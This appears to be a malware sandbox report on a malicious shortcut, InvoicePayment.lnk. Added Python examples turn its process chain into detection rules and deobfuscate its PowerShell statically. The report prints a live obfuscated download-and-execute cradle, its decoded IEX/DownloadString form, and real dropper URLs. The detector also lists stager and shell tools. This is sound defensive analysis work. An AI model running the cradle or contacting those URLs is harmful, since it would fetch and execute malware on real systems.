Analysis

max time kernel: 1579s
max time network: 1579s
platform: windows7_x64
resource: win7v20201028
submitted: 15-01-2021 15:43

Static task: static1
Behavioral task: behavioral1
Sample: InvoicePayment.lnk
Resource: win7v20201028 (windows7_x64)
0 signatures, 0 seconds
General

Target: InvoicePayment.lnk
Size: 2KB
MD5: 0e2623d2481a945842960b2d96759d32
SHA1: 86ad7f3465926187a5243aad50e25e88d8fb716e
SHA256: 83bc020498d9001a23acf434ab33346aea54c19fd27040751e2e61c8cd793b51
SHA512: 6503c4f1dd32a69c873020b95e36f794bfd1f2f00a14f3f73da5ff9902bce22dabff513ce47348c447cac1e88d82654951865baf4d1f767920308e68c9546c3a
Score: 10/10
Malware Config

Extracted (language: hta)
  hta.dropper URL: https://www.minpic.de/k/bgmj/168l7q/

Extracted (language: ps1, deobfuscated)
  ps1.dropper URL: https://www.minpic.de/k/bgmi/113snm/
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid  process
  6     884  mshta.exe
  8     884  mshta.exe
  9     776  powershell.exe

Drops file in System32 directory (1 IoC)
  description: File opened for modification
  ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  process: powershell.exe
  (The recorded path embeds an unexpanded %ProgramData% token and resolves to PowerShell's own Start Menu shortcut rather than a newly written binary.)

Modifies Internet Explorer settings (1 IoC)
  description: Key created
  ioc: \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main
  process: mshta.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid  process
  776  powershell.exe
  776  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description: Token: SeDebugPrivilege
  pid: 776
  process: powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                      pid   process    target process
  PID 1640 wrote to memory of 884  1640  cmd.exe    mshta.exe
  PID 1640 wrote to memory of 884  1640  cmd.exe    mshta.exe
  PID 1640 wrote to memory of 884  1640  cmd.exe    mshta.exe
  PID 884 wrote to memory of 776   884   mshta.exe  powershell.exe
  PID 884 wrote to memory of 776   884   mshta.exe  powershell.exe
  PID 884 wrote to memory of 776   884   mshta.exe  powershell.exe
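The WriteProcessMemory rows above are really a lineage record: cmd.exe starts mshta.exe with a URL, and mshta.exe starts powershell.exe. The following is an added example, not part of the sandbox report, showing how that lineage can be turned into detection logic over normalized process-creation events. The events are constructed to mirror this report's process tree plus one benign control; the field names (pid, ppid, image, cmdline) are an assumed schema rather than any vendor's, and the parent PID of cmd.exe (1000) is an assumption because the report does not show it.

```python
"""Lineage-based detection for the chain this report records
(cmd.exe -> mshta.exe <URL> -> powershell.exe). Added example, not part of the
sandbox report. EVENTS is constructed to mirror the report's process tree plus
one benign control; the schema (pid, ppid, image, cmdline) is an assumed
normalized form. PPID 1000 for cmd.exe is an assumption."""
import re
from typing import Dict, List

EVENTS: List[dict] = [  # constructed from the report's process tree
    {"pid": 1640, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\InvoicePayment.lnk"},
    {"pid": 884, "ppid": 1640, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "https://www.minpic.de/k/bgmj/168l7q/"'},
    {"pid": 776, "ppid": 884,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # shortened, constructed stand-in for the report's tick-obfuscated cradle
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                "I`EX ((n`e`W`-Obj`E`c`T ('Net.Webclient'))"
                ".DownloadString('https://www.minpic.de/k/bgmi/113snm/'))"},
    # benign control (constructed): an admin opening a local HTA, no URL, no child
    {"pid": 2000, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Tools\status.hta'},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# signed script/HTML hosts commonly abused as download-and-execute stagers
STAGERS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, dict]) -> List[str]:
    """Image names from the process up to the oldest ancestor we have an event for."""
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen:  # `seen` guards against PID-reuse loops
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: List[dict]) -> List[dict]:
    """Return one finding per (process, rule) that fires, with the parent chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        chain = ancestry(e["pid"], by_pid)
        parent = chain[1] if len(chain) > 1 else None
        hits = []
        if name in STAGERS and URL_RE.search(e["cmdline"]):
            hits.append("stager_with_remote_url")       # mshta.exe "https://..."
        if name in SHELLS and parent in STAGERS:
            hits.append("shell_spawned_by_stager")      # mshta.exe -> powershell.exe
        if name in ("powershell.exe", "pwsh.exe") and "`" in e["cmdline"]:
            hits.append("powershell_backtick_obfuscation")
        for rule in hits:
            findings.append({"pid": e["pid"], "rule": rule, "chain": " <- ".join(chain)})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Run against the constructed events, mshta.exe (884) fires on the remote URL, powershell.exe (776) fires twice (spawned by a stager, backtick-obfuscated command line), and the local-HTA control produces nothing. The cmd /c line is deliberately not a rule: it is the sandbox's launcher, and on a real workstation the shortcut's parent would normally be explorer.exe.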
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c C:\Users\Admin\AppData\Local\Temp\InvoicePayment.lnk
   - Suspicious use of WriteProcessMemory
   (The cmd /c invocation is the sandbox opening the submitted shortcut; mshta.exe below is what the shortcut resolves to.)

   2. C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "https://www.minpic.de/k/bgmj/168l7q/"
      - Blocklisted process makes network request
      - Modifies Internet Explorer settings
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://www.minpic.de/k/bgmi/113snm/'))))
         - Blocklisted process makes network request
         - Drops file in System32 directory
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         The argument is a download-and-execute cradle obfuscated with backtick-split tokens and '+'-concatenated single-quoted literals (including a long run of empty strings). It resolves to IEX ((New-Object Net.WebClient).DownloadString('https://www.minpic.de/k/bgmi/113snm/')): the second-stage PowerShell is fetched from the ps1.dropper URL listed under Malware Config and executed in memory without touching disk.
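To read the cradle above without executing it, the obfuscation can be undone textually. The following is an added example, not part of the sandbox report: the rewrite rules are the editor's own and cover only the tricks this sample uses (backticks inserted into command and member names, '+'-concatenated single-quoted literals, redundant parentheses, member access through a string literal, and .Invoke()). SAMPLE is the PID 776 argument string copied verbatim from the report.

```python
"""Static normalization of the tick/concat-obfuscated PowerShell cradle recorded
for PID 776. Added example, not part of the sandbox report; the rules are the
editor's own and handle only this sample's tricks. Nothing is executed."""
import re
from typing import List

# The argument string exactly as the report shows it for powershell.exe (PID 776).
SAMPLE = "I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://www.minpic.de/k/bgmi/113snm/'))))"


def strip_ticks(cmd: str) -> str:
    """Drop backticks that sit outside quoted strings.

    Outside a string a backtick only escapes the following character, so I`EX is
    the command IEX. Inside single quotes a backtick is literal and inside double
    quotes it may start an escape (`n, `t), so both are left untouched. Doubled
    single quotes inside a literal ('it''s') are not handled; this sample has none.
    """
    out: List[str] = []
    quote = None
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        if quote:
            out.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            out.append(ch)
        elif ch == "`" and i + 1 < len(cmd):
            out.append(cmd[i + 1])  # keep the escaped character, lose the tick
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


# (pattern, replacement) pairs, applied repeatedly until the text stops changing
RULES = [
    # 'a'+'b' -> 'ab' ; single-quoted literals contain no escapes to re-expand
    (re.compile(r"'([^']*)'\s*\+\s*'([^']*)'"), r"'\1\2'"),
    # (('lit')) -> ('lit') ; one pair is kept since it may be call/argument syntax
    (re.compile(r"\(\s*\(\s*('[^']*')\s*\)\s*\)"), r"(\1)"),
    # .('Member') -> .Member
    (re.compile(r"\.\(\s*'([A-Za-z_]\w*)'\s*\)"), r".\1"),
    # .Member.Invoke(args) -> .Member(args)
    (re.compile(r"\.([A-Za-z_]\w*)\.invoke\(", re.IGNORECASE), r".\1("),
]

# PowerShell is case-insensitive; restore conventional casing for readability
CANONICAL = {"iex": "IEX", "new-object": "New-Object",
             "net.webclient": "Net.WebClient", "downloadstring": "DownloadString"}


def deobfuscate(cmd: str) -> str:
    """Return the cradle with ticks removed, literals joined and casing restored."""
    text = strip_ticks(cmd)
    while True:
        new = text
        for pat, rep in RULES:
            new = pat.sub(rep, new)
        if new == text:
            break
        text = new
    for name, canon in CANONICAL.items():
        text = re.sub(r"\b" + re.escape(name) + r"\b", canon, text, flags=re.IGNORECASE)
    return text


URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_urls(cmd: str) -> List[str]:
    """URLs present after normalization; concatenation could split one across
    literals, so always extract from the joined text, not the raw command line."""
    return URL_RE.findall(deobfuscate(cmd))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(extract_urls(SAMPLE))
```

The fixed-point loop matters: a single pass of the concatenation rule only joins adjacent pairs, so the 50-odd empty strings collapse over several iterations. The extracted URL matches the ps1.dropper entry the sandbox reports under Malware Config, which is the check to make before trusting any deobfuscation.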
Downloads

- memory/776-4-0x0000000000000000-mapping.dmp
- memory/776-5-0x000007FEF35D0000-0x000007FEF3FBC000-memory.dmp (9.9MB)
- memory/776-6-0x0000000001DA0000-0x0000000001DA1000-memory.dmp (4KB)
- memory/776-7-0x000000001AC80000-0x000000001AC81000-memory.dmp (4KB)
- memory/776-8-0x0000000002580000-0x0000000002581000-memory.dmp (4KB)
- memory/776-9-0x0000000001E70000-0x0000000001E71000-memory.dmp (4KB)
- memory/776-10-0x000000001B7F0000-0x000000001B7F1000-memory.dmp (4KB)
- memory/776-11-0x0000000002640000-0x0000000002641000-memory.dmp (4KB)
- memory/776-12-0x0000000002860000-0x0000000002861000-memory.dmp (4KB)
- memory/776-13-0x0000000002890000-0x0000000002891000-memory.dmp (4KB)
- memory/884-2-0x0000000000000000-mapping.dmp
- memory/1972-3-0x000007FEF7B10000-0x000007FEF7D8A000-memory.dmp (2.5MB)